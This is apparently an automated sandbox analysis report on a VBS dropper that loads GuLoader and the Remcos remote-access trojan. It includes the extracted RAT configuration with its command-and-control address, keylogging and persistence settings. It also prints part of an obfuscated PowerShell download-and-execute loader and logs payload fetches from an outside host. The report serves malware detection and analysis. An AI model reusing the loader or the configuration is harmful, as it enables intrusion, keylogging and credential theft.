{"Host:Port:Password": "103.237.87.156:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SACUXX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 10 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_3516.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_5512.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xef49:$b2: ::FromBase64String(
                • 0xdfc4:$s1: -join
                • 0x7770:$s4: +=
                • 0x7832:$s4: +=
                • 0xba59:$s4: +=
                • 0xdb76:$s4: +=
                • 0xde60:$s4: +=
                • 0xdfa6:$s4: +=
                • 0x179f9:$s4: +=
                • 0x17a79:$s4: +=
                • 0x17b3f:$s4: +=
                • 0x17bbf:$s4: +=
                • 0x17d95:$s4: +=
                • 0x17e19:$s4: +=
                • 0xe7ea:$e4: Get-WmiObject
                • 0xe9d9:$e4: Get-Process
                • 0xea31:$e4: Start-Process
                • 0x1868b:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 768, ProcessName: wscript.exe
                Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1096, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6112, ProcessName: conhost.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 768, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. Arkivk/StoreslcInsu pa Futur m$MessersB

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 1096, TargetFilename: C:\ProgramData\remcos\logs.dat

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.156:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SACUXX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_213610F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_21366580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 103.237.87.156
                Source: global trafficTCP traffic: 192.168.2.6:49721 -> 103.237.87.156:1993
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /Fremmeligste.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /qOreedem137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: global trafficHTTP traffic detected: GET /Fremmeligste.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /qOreedem137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000E.00000002.2605351820.0000000004DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000E.00000002.2605351820.0000000004DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E57B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/F
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fr
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fre
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Frem
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremm
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremme
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmel
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeli
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmelig
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligs
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligst
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.x
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xs
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xsn
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xsnP
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xsnXRbl038
                Source: wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3384323626.0000000020930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/qOreedem137.bin
                Source: wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/qOreedem137.bin)
                Source: powershell.exe, 00000002.00000002.2570518162.000002848EA98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: wscript.exe, 00000000.00000003.2087476305.00000222CD3A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089840993.00000222CD3A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: wscript.exe, 00000000.00000003.2094914022.00000222CB4FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096443101.00000222CB509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: wscript.exe, 00000000.00000003.2094914022.00000222CB4FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094849673.00000222CB520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096463612.00000222CB521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096443101.00000222CB509000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.2091024269.00000222CB582000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090012949.00000222CB55B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087476305.00000222CD3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?df83351815365
